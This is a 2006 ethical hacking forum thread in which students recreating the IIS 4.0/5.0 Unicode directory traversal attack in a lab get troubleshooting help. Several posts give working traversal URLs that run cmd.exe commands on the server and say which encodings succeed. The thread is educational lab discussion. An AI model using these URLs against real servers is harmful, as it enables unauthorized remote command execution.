HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 34 guests and 3 members online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow pentest: IIS 4.0 directory traversal ERROR 500
EH-Net
May 21, 2013, 09:42:23 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: pentest: IIS 4.0 directory traversal ERROR 500  (Read 9252 times)
0 Members and 1 Guest are viewing this topic.
paddy
Newbie
*
Offline Offline

Posts: 3


View Profile
« on: August 18, 2006, 04:07:24 AM »
my classmates and i are simulating a directory traversal attack on an NT box we set up in our lab with IIS 4.0

Problem is, when entering the actual directory traversal strings in the browser, we get a 500 Internal Server Error.

example strings are as follows:
 http://testserverIP/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
http://testserverIP/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe

since we know that the path exists and that cmd.exe exists, could anyone
give me an idea as to what is possibly preventing us from successfully recreating the said exploit?

any help would be much appreciated.  thanks.  Smiley
Logged
jimbob
Guest
« Reply #1 on: August 18, 2006, 04:11:20 AM »
Hi,
I don't really know IIS all that well so I'm going to be a little faceious. Have you read the logs? There ought to be an error message explaining the HTTP 500 status codes. Are you sure your version of IIS is vulnerable to that particular attack? Are you sure the attack has not succeeded?

Regards,
Jim
Logged
dean
Guest
« Reply #2 on: August 18, 2006, 08:35:48 AM »
Hi Paddy,

Have a look at the following. It covers the IIS Extended Unicode Directory Traversal Vulnerability.

http://www.securityfocus.com/bid/1806/exploit

Your paths & unicode encoding look correct but you have not told cmd.exe what command to run.

Append this to your URLs:

/cmd.exe?/c+ipconfig

HTH,
Dean
Logged
paddy
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #3 on: August 18, 2006, 11:04:16 PM »
thanks guys.

hmmm... it seems that our testbox was vulnerable to only certain extended unicode combinations.  (like %c1%1c and %c1%9c, for example)

anyone have any ideas why?
I will also look further into this.

BTW, i used the ever popular "cmd.exe?/c+dir" thing... just neglected to include it in the previous post. (sorry 'bout that, Dean)  Smiley
in the meantime, we're still tinkering with the testbox. 
thanks again, guys!   Grin
Logged
LSOChris
Guest
« Reply #4 on: August 19, 2006, 01:32:47 PM »
probably because its windows NT, a 2k box should be vulnerable to more combinations of the unicode attack.
« Last Edit: August 19, 2006, 01:45:58 PM by LSOChris » Logged
dean
Guest
« Reply #5 on: August 19, 2006, 01:42:39 PM »
Hi Paddy,

%c1%1c is the Chinese representation of '\' in Unicode.

%c1%9c is the English representation of '\'

So your IIS server (English, I assume)  Smiley should only be vulnerable to the english version.

%c0%af should also work on your server.

Tested the following on a Win2k server test box I have:
Successful:
http://ipaddr/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://ipaddr/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\

Failed:
http://ipaddr/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

Also, make sure that the directory (eg: /scripts/) is marked as executeable otherwise the attack will fail.

Cheers,
Dean
Logged
paddy
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #6 on: August 21, 2006, 10:27:13 PM »
roger that. Wink

thanks again, guys!

BTW, we're having fun tinkering with the box.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.07 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.